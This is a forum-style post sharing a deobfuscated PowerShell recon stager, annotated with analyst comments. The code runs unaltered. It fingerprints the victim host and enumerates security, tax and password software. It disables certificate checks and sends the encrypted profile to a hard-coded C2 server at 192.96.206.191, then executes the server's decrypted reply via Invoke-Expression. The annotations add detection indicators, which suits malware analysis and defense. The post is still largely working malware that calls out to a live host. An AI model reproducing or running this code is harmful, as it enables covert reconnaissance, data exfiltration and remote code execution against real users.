Hello.
This is pretty interesting: it seems to be a recon script in PowerShell (I don't know if it's a known one and don't have time to check). After multiple layers of obfuscation with Invoke-Obfuscation and various downloads from the same IP, this is the code.
It is self-explanatory at this stage; just read the function names :)
<#
Analyst annotation of the posted PowerShell stager (function GsdsetWweter).
The comments describe only what the visible code does; the code itself is
left exactly as posted.

Positional arguments (read from $args):
  $Serv - C2 base URL (the call at the bottom of the post passes https://192.96.206.191)
  $SK   - ASCII string used directly as the AES key for the first exchange
  $USAG - User-Agent string sent with every request

Flow as written: load assemblies -> generate an RSA-2048 key pair -> POST the
public key (AES-CBC under $SK) -> RSA-decrypt the reply into a session key plus
a one-character mode flag -> POST an AES-CBC host/software profile under the
session key -> AES-CBC-decrypt the reply and run it with Invoke-Expression.
#>
function GsdsetWweter {
$Serv = $args[0]
$SK = $args[1]
$USAG = $args[2]
# Assembly loads; the return values are discarded via $Null.
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
# Non-terminating errors are hidden for the rest of the function.
$ErrorActionPreference = "SilentlyContinue";
# ASCII encoder reused for every key and body conversion below.
$e=[System.Text.Encoding]::ASCII;
# Host fingerprint ("bot ID"): lower-case hex digest (MD5 by default) of
# lower(username + machinename + BIOS serial). It is stable across runs on one
# host, so the same value recurs in the SESSIONID cookie built further down.
function Get-SysID($HashName = "MD5"){
[string]$ret = ""
$hd = gwmi win32_bios
$ret = $hd["SerialNumber"].ToString()
[string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower();
$StringBuilder = New-Object System.Text.StringBuilder
[System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{
[Void]$StringBuilder.Append($_.ToString("x2"))
}
# Function-scope assignment: this $e does not overwrite the outer ASCII encoder.
$e = $StringBuilder.ToString().ToLower()
$e
}
# Joins the VALUES of a hashtable with ';' (keys are dropped). $output is never
# initialised, so it starts as $null and becomes a string on the first '+='.
# Field order is whatever Hashtable enumeration yields, not the literal's order.
Function HasGet-Bretring($ht) {
$first = $true
foreach($pair in $ht.GetEnumerator()) {
if ($first)
{
$first = $false
}
else
{
$output += ';'
}
$output+="{0}" -f $($pair.Value)
}
$output
}
# One record per adapter with NetConnectionStatus=2 (connected): Name, IP (all
# IPAddress entries of the related configuration object), MAC and DeviceID.
function Get-workconfig {
Get-WmiObject Win32_NetworkAdapter -Filter 'NetConnectionStatus=2' |
ForEach-Object {
$result = 1 | Select-Object Name, IP, MAC, ID
$result.Name = $_.Name
$result.MAC = $_.MacAddress
$result.ID = $_.DeviceID
$config = $_.GetRelated('Win32_NetworkAdapterConfiguration')
$result.IP = $config | Select-Object -expand IPAddress
$result
}
}
# Builds the '|'-delimited host profile sent in the second POST:
#   domain|user|machine|<adapters>|osname|isadmin|WxH|procname|pid|psmajor|arch|timezone|lastboot
# where <adapters> is one ';'-joined record per connected adapter, each
# terminated by '!'.
function Get-Sysinfo {
$str = [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName;
$string = ""
foreach($c in Get-workconfig){
[string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID
# Dead line: $p is never defined and $ip is reassigned on the next line.
$ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6];
# First address of the adapter, or '0.0.0.0' when missing/blank.
[string]$ip = $c.IP[0]; if(!$ip -or $ip.trim() -eq '') {$ip='0.0.0.0'};
$lanconf = @{
id = $ID
ip = $ip;
mac = $macadr;
name = $lanname;
}
$string += HasGet-Bretring $lanconf
$string += "!"
}
$o = (Get-WmiObject Win32_OperatingSystem)
$str += "|$string";
# OS name only (Win32_OperatingSystem.Name carries boot-path fields after '|').
$str += '|' +$o.Name.split('|')[0];
# 'True' when running as SYSTEM, otherwise the local Administrator role check.
if(([Environment]::UserName).ToLower() -eq "system"){
$str += '|True'
}
else{
$str += '|'+ ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
}
[void] [Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$Screens = [system.windows.forms.screen]::AllScreens
# The loop body only assigns, so the dimensions of the LAST screen survive.
foreach ($Screen in $Screens) {
$Width = $Screen.Bounds.Width
$Height = $Screen.Bounds.Height
}
# The backtick keeps "$Width" and the literal x apart (`x is not an escape),
# giving e.g. 1920x1080.
$str += '|' + "$Width`x$Height"
$n = [System.Diagnostics.Process]::GetCurrentProcess()
$str += '|'+$n.ProcessName+'|'+$n.Id
$str += '|' + $PSVersionTable.PSVersion.Major
$str += '|' + $ENV:PROCESSOR_ARCHITECTURE
$str += '|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption
$str += '|' + $o.ConvertToDateTime($o.LastBootUpTime)
$str
}
# Random request path: $args[0] DISTINCT letters (Get-Random -Count samples
# without replacement) from an alphabet that lacks n, q and w, plus a random
# .php/.jsp/.asp extension. Called with 9 and 13 below.
# Detection: HTTPS POSTs to a bare IP whose path is a 9- or 13-letter name with
# no repeated letter and one of those three extensions.
function getlisturi{
$RandName = -join("abcdefghijklmoprstvuxyz".ToCharArray()|Get-Random -Count $args[0]);$ar = @('php','jsp','asp') | Get-Random;
$RandName + '.' + $ar
}
# Enumerates HKLM\SOFTWARE[\Wow6432Node]\Microsoft\Windows\CurrentVersion\Uninstall
# through the remote-registry API (OpenRemoteBaseKey, defaulting to the local
# host name) and emits "<DisplayName>;" for every entry matching $NameRegex.
# The regex mixes browsers, US tax-preparation products, AV/firewall vendors,
# QuickBooks, password/FTP/SSH tools and Outlook - a profiling/targeting list.
function Get-Soft {
param (
[Parameter(ValueFromPipeline=$true)]
[string[]]$ComputerName = $env:COMPUTERNAME,
[string]$NameRegex = '(Opera|Firefox|Chrome|TAX|Lacerte|OLT|ProSeries|Ultratax|Drake|Taxslayer|ProTaxPro|Taxwise|Avast|ESET|Malwarebytes|McAfee|Norton|Panda|Sophos|Webroot|Bitdefender|Symantec|Trust|EICAR|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|quickbooks|keypass|ftp|ssh|Outlook)'
)
foreach ($comp in $ComputerName) {
$keys = '','\Wow6432Node'
foreach ($key in $keys) {
try {
$apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
} catch {
# Hive not present (e.g. no Wow6432Node on a 32-bit host): skip silently.
continue
}
foreach ($app in $apps) {
$program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app")
$name = $program.GetValue('DisplayName')
# $str is reset per entry, so each match is emitted as its own string.
$str = ''
if ($name -and $name -match $NameRegex) {
$str += $name + ';'
$str
}
}
}
}
}
# AES-CBC provider, with RijndaelManaged as the fallback on hosts without the CSP.
try {
$FirstAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider; }
catch {
$FirstAES=New-Object System.Security.Cryptography.RijndaelManaged;
}
# IV: 16 distinct values drawn from 0..255 (Get-Random -Count picks without replacement).
$FirstIV = [byte] 0..255 | Get-Random -count 16;$FirstAES.Mode="CBC";
# Key: raw ASCII bytes of $SK. The literal passed at the bottom of the post is
# 32 characters, i.e. a 256-bit key.
$FirstAES.Key=$e.GetBytes($SK);
$FirstAES.IV = $FirstIV;
# RSA-2048 key pair created with UseMachineKeyStore; this may leave a key
# container in the machine key store (forensic artifact - verify on a sample host).
$csp = New-Object System.Security.Cryptography.CspParameters;
$csp.Flags = $csp.Flags -bor [System.Security.Cryptography.CspProviderFlags]::UseMachineKeyStore;
$rs = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList 2048,$csp;
# Public half only ($False) as XML, ASCII-encoded.
$rk=$rs.ToXmlString($False);$ib=$e.getbytes($rk);
# First request body: IV || AES-CBC(public key XML) under $SK.
$eb=$FirstIV+$FirstAES.CreateEncryptor().TransformFinalBlock($ib,0,$ib.Length);
# Bot ID, base64-encoded twice; this becomes the SESSIONID cookie value.
$BotIDXor= Get-SysID;
$EncodedText =[Convert]::ToBase64String($e.getbytes($BotIDXor));
$EncodedText2 =[Convert]::ToBase64String($e.getbytes($EncodedText));
if(-not $wc){
# TLS certificate validation is disabled process-wide ({ $true }), so the
# bare-IP C2 can present any certificate. System proxy with default credentials.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
$wc=new-object system.net.WebClient;
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
}
$wc.Headers.Add("User-Agent",$USAG);
# Detection: Cookie header of the form "SESSIONID:<value>" (colon, not '='),
# where <value> is base64(base64(32 hex characters)).
$wc.Headers.Add("Cookie","SESSIONID:$EncodedText2");
# POST 1: random 9-letter path; the reply is RSA-encrypted to the key sent above.
$raw=$wc.UploadData($Serv + "/" + $(getlisturi 9),"POST",$eb);
# Debug output left in; "STAGER GET raw" would show up in any console/transcript log.
write-host "STAGER GET raw " $raw
# RSA PKCS#1 v1.5 decrypt ($false = no OAEP). Reply layout: session key
# followed by a single mode character.
$de=$e.GetString($rs.decrypt($raw,$false));
$key=$de[0..($de.length-2)] -join '';
$k=$de[$de.length-1] -join '';
# Mode "0": full profile (Get-Sysinfo + Get-Soft; the Get-Soft strings are
# joined with $OFS, a space by default). Anything else: short "OK|isadmin|pid".
if ($k -eq 0) {
$str1 = Get-Sysinfo;
$str2 = Get-Soft;
$str = $str1 + '|' + $str2
}
else{$str = 'OK'+ '|' + ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") + '|' + ([System.Diagnostics.Process]::GetCurrentProcess()).id}
# POST 2 body: IV || AES-CBC(profile) under the session key.
$SecondAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
$SecondIV = [byte] 0..255 | Get-Random -count 16;
$SecondAES.Mode="CBC"; $SecondAES.Key=$e.GetBytes($key); $SecondAES.IV = $SecondIV;
$ib2=$e.getbytes($str);
$eb2=$SecondIV+$SecondAES.CreateEncryptor().TransformFinalBlock($ib2,0,$ib2.Length);
# POST 2: random 13-letter path (the User-Agent header is added a second time).
$wc.Headers.Add("User-Agent",$USAG);
$raw=$wc.UploadData($Serv+ "/" + $(getlisturi 13),"POST",$eb2);
try {$AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;}
catch {$AES=New-Object System.Security.Cryptography.RijndaelManaged;}
$AES.Mode="CBC";
# Reply: first 16 bytes are the IV, the rest is AES-CBC under the session key.
$IV = $raw[0..15];$AES.Key=$e.GetBytes($key);$AES.IV = $IV;
$shelles = [System.Text.Encoding]::ASCII.GetString($($AES.CreateDecryptor().TransformFinalBlock($raw[16..$raw.Length],0,$raw.Length-16)))
# Remote code execution: the decrypted server reply is run as PowerShell.
# Script Block Logging (Event ID 4104) records the text handed to Invoke-Expression.
iex $shelles
# Clears locals and the error history, then forces a GC - housekeeping that
# also reduces what a memory capture would recover.
$FirstAES=$null;$BotIDXor=$null;$rs=$null;$eb2=$null;$raw=$null;$IV=$null;$str=$null;$ib2=$null;$SecondAES=$null;$AES=$null; $SecondIV=$null;$shelles= $null;
$Error.Clear()
[GC]::Collect()
[GC]::WaitForPendingFinalizers()
# Hands off to federerfegegfeg, which is not defined anywhere on this page -
# presumably supplied by the script just executed. Arguments: session key,
# cookie header value, C2 URL, a '|'-separated string of five candidate paths
# and the User-Agent, the admin flag, and the PowerShell major version.
federerfegegfeg $key "SESSIONID:$EncodedText2" $Serv '/sale/getinfo.php,/getnews.asp,/update/news.html,/defender/main.jsp,/mains.asp|Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0' $([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") $PSVersionTable.PSVersion.Major
}
# Entry call with the hard-coded C2 base URL, the 32-character AES key and the
# User-Agent. The User-Agent claims Windows NT 6.4 with Chrome/36 and Edge/12.0,
# an unusual combination that is itself a usable network indicator.
GsdsetWweter 'https://192.96.206.191' ':nP&2[Ia+4E7)V~z.M5pvdrsXle$]!U(' 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0'
https://ghostbin.com/paste/83av7